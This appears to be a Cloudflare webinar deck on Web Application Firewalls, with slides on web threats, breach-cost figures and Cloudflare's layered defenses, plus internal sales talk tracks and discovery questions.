Preventing data breaches and stopping malicious bots has become a top priority for many companies. Cloudflare blocks over 400 million malicious requests each day and from this we know that installing and forgetting a Web Application Firewall is no longer enough. In order to keep up, rules must not only be updated and monitored constantly, but they must also be augmented with other security services to provide an effective solution.
3. Agenda
● Housekeeping
● Why a WAF?
● Current Security Threats
● Business Impacts
● Finding an Intelligent WAF
● Necessary Surrounding Services
● Q & A
4. Housekeeping
● Ask questions in the “Questions” chat box in ReadyTalk.
● We’ll triage all questions at the end of the presentation.
● We’ll be emailing the slides and recording to all registrants.
● All attendees are muted.
6. Why did you originally buy a WAF?
Protect applications from targeted attacks
Malicious Payloads: SQLi, null bytes, malformed data, XSS
Keep customers and their data secure
Protect website from defacement or content theft
8. Customers’ Security Threats
SYSTEM
DDoS Attack
Attack traffic impacts
availability or performance
Data Theft Attempt
Compromise of sensitive
customer data
Bots
Prevent malicious bots from
abusing site or application
Webpage
9. Compromise of Sensitive Customer Data
Fake Website
Visitors
1DNS Spoofing
Malicious Payload
eg: SQLi that ex-filtrates PII
and credentials
3
Attacker
Bots Brute Force
4
Data Snooping
2
10. Malicious Bot Attacks
Account Takeover
Taking over an account
to abuse the site, make
fraudulent purchases,
or extract financial
information of user
Content Scraping
Stealing public information on
the website such as prices or
valuable SEO content
Resell itemBots
Bots
Checkout Fraud
Automated purchasing of
valuable or limited inventory
Bots
Website with
stolen content
12. Lost customer trust
and degraded brand value
Lost revenue from
site downtime or higher costs
from bad traffic
Business Impacts Business Impact
● $141 average cost for
each lost or stolen
record containing
sensitive and
confidential
information
● $3.62 million is the
average total cost of a
data breach
Cost categories:
Remediation costs (hardware, services, and software), lost revenue, lost future revenue from
customer churn, wasted marketing spend, negative brand impact, help desk costs, increase
IT staffing costs, loss of user productivity
IDC March 2015, and Ponemon Institute, June 2017
19. Cloudflare Solution to Protect
Sensitive Customer Data
ATTACKS
Attackers try to forge DNS
answers to intercept
customer credentials
Snoop unencrypted sensitive
data entered by customers
Brute-force their way into
login pages
Inject malicious payloads
through forms and APIs
Resilient DNS and DNSSEC
prevents forged answers
Encryption through
SSL/TLS blocks snooping
Log-in protection
through rate limiting
Block top OWASP and emerging
application-level attacks
through the WAF
● Layered defense to
protect against
sophisticated attackers
● Single control-plane for
more robust and agile
security policies
● Learning from attack
profiles across 6M websites
to keep yours safe
1.
2.
3.
4.
CLOUDFLARE
SOLUTIONS
20. Cloudflare Solution to Prevent Malicious Bots
ATTACKS
Account takeovers
Content scraping
Fraudulent checkout
1.
2.
3.
CLOUDFLARE
SOLUTIONS
Dynamic scoring of
IP reputation
Fingerprinting bad
behavior across network
Global intelligence
across 6M websites and
400B daily requests
Block known bad signatures with
proactive shared intelligence
Block brute-force
login with rate
limiting
22. The Cloudflare Advantage
Integrated Performance,
Security, and Reliability
7M customers and routing traffic for
2.5
Global
Data Center
Anycast
Network
China
Network
Firewall DDoS
Content
Optimization
Load
Balancing
AMP
Rate
Limiting
DNS
Argo WAF CDN Latest Web
Standards
TLS
Data Centers with
10 Tpbs capacity
120+
HTTP Internet traffic
10% All DNS queries
38%&
SCALE INTEGRATED
STACK
EASY FINE-
GRAINED
CONTROL
Talk Track:
In light of this growing exposure to security risks, what are those primary threats you may encounter?
We spent time talking with OUR customers across different verticals to truly understand the most common fears. These match what industry analysts are reporting:
Site is unavailable because of denial of service attack
Customer data is compromised, (e.g. breached or stolen)
Increasingly, abusive bot activity
For each of these broad types of threats, we’ll quickly go into more detail about what those types of threats or attacks could look like.
Questions:
Which, if any, of these are most important for you?
For the others, do you anticipate they could become problems or think they won’t impact your business? And if so, why?
If there was a pre-call…”I know you shared initial concerns about DDoS, what about data compromise?”
Talk Track:
When it comes to compromise of sensitive customer data, you may be most familiar with malware.
While that’s a very visible form of attack right now, we should consider there are other common, just not as media-hyped, forms of customer data theft.
The take-away for this slide is that attackers can take advantage of different vulnerabilities.
DNS Spoofing: visitors are directed to a fake site instead of your site
A compromised DNS record, or "poisoned cached," can return a malicious answer from the DNS server, sending an unsuspecting visitor to an attacker's site. This enables attackers to steal user credentials to then take-over legitimate accounts.
Data Snooping: sensitive data like visitor’s credentials or credit cards are snooped over the wire
Attackers can intercept or "snoop" on customer sessions to steal sensitive customer data, including credentials such as passwords or credit-cards numbers.
Brute Force: attackers are repeatedly trying credentials to take over an account
Attackers can wage "dictionary attacks" by automating logins with dumped credentials to "brute force" their way through a login-protected page.
Malicious Payload: SQL-injection, cross-site scripting, remote file inclusion that results in ex-filtrated data
Malicious payloads exploit an application vulnerability. The most common forms are SQL injections, cross-site scripting, and remote file inclusions. Each of these can exfiltrate sensitive data by running malicious code on the application.
The risk is that sensitive customer data, such as credit card information, might get compromised.
Talk Track:
The third attack: increasingly, bots are becoming more common forms of attack.
The three most common we have seen and blocked are:
Content scraping: which essentially steals website content and hurts SEO or revenue
Check out fraud: the most common is the “sneaker bot” which takes limited inventory and buys before actual customers can get them
Account takeover: the result typically of a brute force login to then use a compromised account
Talk Track:
So what happens when you experience one or more of these problems we just discussed? Many of our customers shared with us they have both intangible and tangible costs.
You can see some of the potential cost categories and, if you are interested, we can schedule time with your team to get a better handle on the costs if you don’t know details right now.
However, for the purposes of this conversation, we’ve found it’s often helpful to think about and to discuss the potential costs. The areas of cost can range, as you can see on the list, from remediation costs to loss of user productivity. It doesn’t need to be accurate. But reviewing these can reveal whether the problem is a one-hundred dollar a month problem, or a one-hundred thousand dollar a month problem.
Some questions include:
What is the cost for an hour of downtime due to a DDoS in lost customers?
What would be the cost if just one customer record were breached in terms of remediation or customer churn?
What happens to revenue or your brand when malicious bots abuse your site?
Source:
IDC, March 2015: “DevOps and the Cost of Downtime: Fortune 1000 Best Practice Metrics Quantified”, Stephen Elliot. This was commissioned by AppDynamics
Ponemon Institute, 2017
Internal background reading - Enablement:
These are discovery/conversation slides
This is very important. You will have a more difficult time ultimately doing the sale or upsell without it unless the customer’s hair is on fire to buy something.
On the right hand side are the types of costs to explore with customers. Potential responses from customers and options for responses:
If the customer responds: I don’t know
“That’s fine. I could imagine the person who would know would be interested. Could we include him in future meetings as a way to help you get the answers?”
“I understand. Who would know about these numbers in your organization?”
“Sure. Do you think you could make an educated guess? Is this $5 per incident or $50,000 per incident?”
We have found that it’s valuable for companies to quickly get a sense of the business impacts you most care about.
These two were consistently what customers shared as big concerns, whether they use Cloudflare or not.
Which of these are important to you?
What connection do you see between these and downtime from DoS and breached customer data?
Who in the org care about these impacts?
Here are some examples from conversations with existing customers:
Trust
A financial services customer said lost of trust would directly impact customer and revenue
A medical ecommerce customer said losing trust would be “game over” as a business
A hospitality company values the brand as key to their business and downtime hurt the brand
A media site said losing trust of readers as a news site by being down would impact short-term ad revenues and long-term brand (which impacted advertisers)
Trust goes down, Revenue goes down in every case
If you had to give a dollar amount of the impact, what would it be?
Notes: Are costs critical to the buying decision?
Costs could be the increased costs of backend servers during attacks
-- For example, the service HaveIbeenPwnd, saw a 5x increase in Azure services due to attacks
-- A media company customer saw bandwidth costs increase 1000x from attack traffic
Revenue could be the impact during an outage
Downtime for many companies, from e-commerce, to SaaS, to ad-driven businesses, can be in the tens of thousands of dollars, due to lost customers, lost ad dollars
If you have to pick an area with the biggest potential impact, which would it be?
RESEARCH from competitors:
The average global cost of data breach per lost or stolen record was $141. However, health care organizations had an average cost of $380 and in financial services the average cost was $245. Media ($119), research ($101) and public sector ($71) had the lowest average cost per lost or stolen record.
2017 Cost of Data Breach Study Global Overview Benchmark research sponsored by IBM Security Independently conducted by Ponemon Institute LLC June 2017
https://www.theatlantic.com/technology/archive/2016/10/a-lot/505025/
https://www.ponemon.org/blog/2014-cost-of-data-breach-united-states
https://security.radware.com/uploadedFiles/Resources_and_Content/Attack_Tools/CyberSecurityontheOffense.pdf
https://www.corero.com/company/newsroom/press-releases/market-study-indicates-ddos-protection-is-a-high-priority-for-data-centres-hosting-providers-and-network-services-providers/
https://ns-cdn.neustar.biz/creative_services/biz/neustar/www/resources/whitepapers/it-security/ddos/2015-oct-ddos-report.pdf
Talk Track
Earlier we discussed four common vectors for attacks to compromise or steal sensitive data.
The take-away for this slide is this: when there are multiple vectors, you need a layered defense.
To defend against malicious payloads, you need a WAF - WAF checks the payload against malicious OWASP on the application
To prevent unintended snooping of data, you need easy to manage and deploy encryption - TLS encrypts the content so protects against sniffing
To block brute force logins, you need rate-based log-in protection - Rate Limiting checks against threshold volume to protect against DDOS, brute-force or scraping
To prevent forged DNS answers that can send customers to a fake site, you need resilient DNS and DNSSEC - DNS tells us the address the request goes to and secure DNS protects against phishing
All these work seamlessly and are easy to set up and configure through the Cloudflare UI as well as through a rich set of APIs.
The high level takeaways are:
Multiple attack vectors
Cloudflare has layered defense
Easy to configure across all services
Learn across 6m websites
Background Reading - you can build this into your talk track:
Reduce risks of data compromise through layered defense
Attackers often use several attack vectors when attempting to compromise customer data. To protect themselves, companies need a layered defense.
REDUCE SPOOFING THROUGH SECURE DNS
Cache poisoning or "spoofing" tricks unsuspecting site visitors to enter sensitive data, such as credit card numbers, into an attacked site. This type of attack occurs when an attacker poisons the cache of a DNS name server with incorrect records. Until the cache entry expires, that name server will return the fake DNS records. Instead of being directed to the correct site, visitors are routed to an attacker's site, allowing the bad actor to extract sensitive data.
DNSSEC verifies DNS records using cryptographic signatures. By checking the signature associated with a record, DNS resolvers can verify that the requested information comes from its authoritative name server and not a man-in-the-middle attacker.
REDUCE SNOOPING THROUGH ENCRYPTION
Attackers can intercept or "snoop" on customer sessions to steal sensitive customer data, including credentials such as passwords or credit-cards numbers. In the case of a "man-in-the-middle" attack, the browser thinks it is talking to the server on an encrypted channel, and the server thinks it is talking to the browser, but they are both talking to the attacker who is sitting in the middle. All traffic passes through this man-in-the-middle, who is able to read and modify any of the data.
Fast encryption/termination, easy certificate management, and support of the latest security standards enable customers to secure transmission of user data.
BLOCK MALICIOUS PAYLOADS THROUGH AUTO-UPDATED, SCALABLE WAF
Attackers exploit application vulnerabilities by submitting malicious payloads that can extract sensitive data from the database, the user's browser, or from injecting malware that can compromise targeted systems.
A Web Application Firewall (WAF) examines web traffic looking for suspicious activity; it can then automatically filter out illegitimate traffic based on rule sets that you ask it to apply. It looks at both GET and POST-based HTTP requests and applies a rule set, such as the ModSecurity core rule set covering the OWASP Top 10 vulnerabilities to determine what traffic to block, challenge or let pass. It can block comment spam, cross-site scripting attacks and SQL injections.
The Cloudflare Web Application Firewall (WAF) updates rules based on threats identified because of its 6M customers, and can protect customers without hurting application performance because of its low-latency inspection and integration with traffic acceleration.
REDUCE ACCOUNT TAKE-OVERS THROUGH LOGIN PROTECTION
Attackers can wage "dictionary attacks" by automating logins with dumped credentials to "brute force" their way through a login-protected page.
Cloudflare enables users to customize rules to identify and block at the edge these hard-to-detect attacks through its rate-limiting rules
Talk Track:
Bots are sophisticated and varied. The most common forms of attacks are account takeovers, content scraping and fraudulent checkout.
Because there are different types of attacks, Cloudflare’s approach leverages different forms of defense.
Here’s an example:
Most bots, such as abusive checkouts or content scraping, have an unusually high volume of requests. Our customizable rate limiting solution has solved the problem for customers.
Because of the amount of traffic Cloudflare sees, our IP reputation scoring and ability to analyze behavior to detect malicious bots helps to block bad traffic sources such as malicious bots.
By combining flexible rules with global shared intelligence, Cloudflare helps customers to prevent malicious bots.